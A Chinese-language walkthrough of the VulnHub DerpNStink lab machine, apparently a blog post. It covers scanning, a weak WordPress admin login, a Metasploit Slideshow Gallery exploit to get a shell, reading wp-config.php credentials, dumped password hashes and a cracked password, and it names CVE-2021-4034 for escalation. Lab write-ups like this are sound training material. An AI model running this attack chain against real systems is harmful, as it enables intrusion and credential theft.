【vulnhub】DerpNStink靶机

西河刘卡车医 · 2024-9-2 23:04:48

靶机安装

下载所在：DerpNStink: 1 ~ VulnHub
信息网络

靶机IP扫描

nmap 192.168.93.0/24

复制代码

端口扫描，开放21、22、80端口

nmap -A 192.168.93.158 -p-

复制代码

目录扫描

dirsearch -u http://192.168.93.158

复制代码

进行网址访问，页面上只有个单词DeRPnStiNK，先记下来

点击检查，发现第一个flag

又发现存在一个文件/webnotes/info.txt进行访问

翻译一下

是需要更新当地DNS主机文件，思考应该是需要我们把IP和对应的域名进行添加到hosts文件中，但不知道域名是什么

后面拼接扫描出来的目录/php/phpmyadmin/看起来应该是一个可以登录到数据库里面的

拼接/robots.txt

继承访问

我们重新用另一下令进行目录扫描一下,会出现许多上面没有扫出来的目录，

dirb http://192.168.93.158

复制代码

weblog目录下存在登录页面，测试一下

发现进行了域名跳转到：https://derpnstink.local/weblog/，并且页面加载失败
因此大概前面的DNS更新应该是192.168.93.158与derpnstink.local/weblog/的对应关系添加

通过目录扫描出来的，还有目录//weblog/wp-admin/

尝试弱口令登录，成功 admin/admin

毛病利用

这个框架是WordPress，进行工具使用 wpscan 扫描，扫描到许多插件存在毛病

wpscan --url http://derpnstink.local/weblog

复制代码

使用Slideshow Gallery 存在的毛病
因为我们知道后台的账户密码，以是我们用msf来进行getshell操作
开启msf情况

msfconsole
search slideshow
use 1
show option
set rhosts 192.168.93.158
set targeturi /weblog/ #设置目标的url目录地址
set wp_user admin
set wp_password admin
run

复制代码

先将获取到的shell变化为交互式的shell

shell
python -c 'import pty; pty.spawn("/bin/bash")' # 获得交互式命令行

复制代码

翻看配置文件，发现了目标数据库的账号和密码

cd /var/www/html/weblog
ls
cat wp-config.php
root:mysql

复制代码

是数据库的账号和密码，回到页面进行登录，登录成功

访问 wp_posts 表发现 flag2.txt

在 wp_users 表发现两个账户密码

unclestinky：$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin：$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

复制代码

破解之后是wedgie57

在靶机home目录下发现两个用户，mrderp/stinky

尝试切换到stinky用户，密码使用刚刚破解得到的wedgie57

成功切换到stinky用户，进入到stinky目录并查看当前目录的全部文件

在Desktop目录发现了flag3

提权

观察到ubuntu版本是14.04，大概存在一个毛病。
我刚开始用的是kali上面的searchsploit工具下令进行搜刮版本利用搜刮出来的脚本文件，但失败了，也大概是利用的脚本不对，各人可以多尝试几个脚本，看看能否成功，也希望与各人讨论
我在这找了一个有关版本的干系提权文件，有一个当地提权毛病CVE-2021-4034，作用有点雷同于sudo，允许用户以另一个用户身份实行下令